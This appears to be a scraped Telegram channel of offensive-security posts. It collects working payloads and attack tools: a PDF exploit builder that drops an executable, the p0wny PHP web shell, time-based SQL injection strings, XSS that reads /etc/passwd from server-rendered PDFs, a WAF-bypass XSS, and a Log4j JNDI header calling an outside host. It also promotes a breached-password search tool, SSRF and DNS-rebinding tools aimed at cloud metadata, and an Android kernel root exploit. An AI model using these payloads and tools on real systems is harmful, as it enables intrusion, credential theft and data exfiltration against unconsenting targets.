LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
Requirements:
pip install -r requirements.txtLeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]BugCod3#Python #Search #Parse #Password
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2⚡1👍1💯1
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).
Put your exe-link and build the PDF-FILE
BugCod3#C #PDF #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥3❤2👎2
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this noscript represents a security risk for the server.
↑ ↓)Tab key)cd command)upload <destination_file_name> command)download <file_name> command)Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php
BugCod3#PHP #Shell #Pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
If you find Web frameworks like Symfony, add
to the wordlist, and you may get juicy data.
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'to the wordlist, and you may get juicy data.
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥5⚡2❤1
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡8❤1👍1
Canarytokens
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
🌐 Site
#Pentesting #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
🌐 Site
#Pentesting #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!
Site
ΔYロIᗐコΞ 👾
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Site
ΔYロIᗐコΞ 👾
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤2⚡2🔥1
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡2❤1🔥1
For 0Day SQLI in
(app extension)
payload was:
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤2⚡1👍1🔥1
XSS to Exfiltrate Data from PDFs
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</noscript><noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</noscript>How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥3❤2⚡1
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402
┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403#Notification #NewYear
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤5⚡1🔥1
If you are testing API, before fuzzing observe these:
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👍3❤1⚡1🔥1
Akamai WAF bypass XSS
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡1❤1🔥1
Log4j 🙌 Application was running java
Vulnerable header :
#BugBounty #Tips #Security
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡1❤1🔥1
Easy P1 🔥
Add to your wordlist
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤1⚡1🔥1
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
Pixel 7 Pro:
Pixel 7 Pro:
Pixel 7:
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
Github
⬇️ Download
🔓
#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keysPixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keysVulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.Github
⬇️ Download
🔓
BugCod3#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤1⚡1👍1🔥1
java2S3 Amazon S3 Bucket Enumeration Tool
Introduction:
This Python noscript automates the enumaration of S3 Buckets referenced in a subdomain's javanoscript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
Usage:
Create a text file (
Github
⬇️ Download
🔓
#Python #Amazon #S3 #Buckets
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Introduction:
This Python noscript automates the enumaration of S3 Buckets referenced in a subdomain's javanoscript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests
Usage:
Create a text file (
input.txt) containing a list of subdomains (one per line).python js2s3.py input.txt example.com output.txt
Github
⬇️ Download
🔓
BugCod3#Python #Amazon #S3 #Buckets
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡2❤1🔥1
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
Usage (command line):
Github
⬇️ Download
🔓
#Ruby #Proxy #SSRF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
gem install ssrf_proxy
Usage (command line):
ssrf-proxy [options] -u <SSRF URL>
ssrf-proxy -u http://target/?url=xxURLxx
Github
⬇️ Download
🔓
BugCod3#Ruby #Proxy #SSRF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤2⚡1🔥1
httprebind
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
Usage:
Where
Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
⬇️ Download
🔓
#Python #DNS #SSRF #Attack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
sudo pip install dnslib flask flask_cors
Usage:
sudo python httprebind.py domain.name serverIp mode
Where
mode is one of: ec2, ecs, gcloudMake sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
⬇️ Download
🔓
BugCod3#Python #DNS #SSRF #Attack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
⚡1❤1🔥1